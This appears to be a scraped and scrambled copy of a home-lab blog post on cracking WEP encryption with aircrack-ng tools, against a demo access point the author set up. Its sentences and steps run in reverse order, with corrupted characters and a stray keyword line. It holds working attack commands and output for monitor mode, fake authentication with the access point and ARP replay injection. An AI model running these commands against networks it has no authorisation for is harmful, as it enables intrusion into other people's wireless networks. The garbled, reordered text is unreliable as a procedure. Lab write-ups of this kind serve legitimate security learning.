Read 4574 packets (got 1 ARP requests and 378 ACKs), sent 379 packets.(499 pps) Read 4471 packets (got 1 ARP requests and 329 ACKs), sent 329 packets.(499 pps) Read 4362 packets (got 1 ARP requests and 278 ACKs), sent 280 packets.(501 pps) Read 4255 packets (got 1 ARP requests and 228 ACKs), sent 230 packets.(501 pps) Read 4147 packets (got 1 ARP requests and 178 ACKs), sent 179 packets.(499 pps) Read 4036 packets (got 1 ARP requests and 128 ACKs), sent 129 packets.(498 pps) You should also start airodump-ng to capture replies. Saving ARP requests in replay_arp-0318-113544.cap : ~/wep# aireplay-ng -arpreplay -b 06:xx:xx:xx:xx:xx -h 00:xx:xx:xx:xx:xx wlan0monġ1:35:44 Waiting for beacon frame (BSSID: 06:xx:xx:xx:xx:xx) on channel 1 This will allow us to obtain a lot of IVs in a short period. This will allow aireplay to listen for ARP request packets, and then inject them back into the network. In this case, I used aireplay in ARP replay mode. Once the fake authentication was complete, I was able to start generating traffic. : ~/wep# aireplay-ng -1 0 -e WEPisBAD -a 06:xx:xx:xx:xx:xx -h 00:xx:xx:xx:xx:xx wlan0monġ1:33:51 Waiting for beacon frame (BSSID: 06:xx:xx:xx:xx:xx) on channel 1ġ1:33:51 Sending Authentication Request (Open System) ġ1:33:51 Sending Association Request ġ1:33:51 Association successful 🙂 (AID: 1) Since I do not know the WEP key yet, aireplay can fake an authentication for me.
Crack wep password kali mac#
The reason for this is that the AP will not accept packets from a MAC address that it does not already recognize. The next step was to perform a fake authentication with the AP.
: ~/wep# airodump-ng -c 1 -bssid 06:xx:xx:xx:xx:xx -w output wlan0mon With packet injecting possible (at a 100% rate), I started airodump again to begin capturing IVs. Once the monitoring interface was back up, it was time to test packet injection.
If airodump-ng, aireplay-ng or airtun-ng stops working afterĪ short period of time, you may want to run 'airmon-ng check kill' : ~/wep# airmon-ng start wlan0 1įound 3 processes that could cause trouble. (mac80211 monitor mode vif disabled for wlan0mon) (mac80211 station mode vif enabled on wlan0) Phy0 wlan0mon ath9k_htc Atheros Communications, Inc. : ~/wep# airodump-ng wlan0mon -encrypt WEPĪfter I found the new SSID, I restarted my monitoring interface on channel 1. Note that the encrypt flag will filter out my results, and only show me WEP networks. Once I configured the AP, I ran airodump to find the new network. Setupįirst, I setup a 2nd SSID on my AP that would support WEP, and generated a random 128-bit key. While I wasn’t able to find any in my neighborhood, I setup a demo AP for some WEP cracking at home.įor those of you that didn’t know, I recently picked up a new alfa card, so it was time to give it a test drive.
0 kommentar(er)
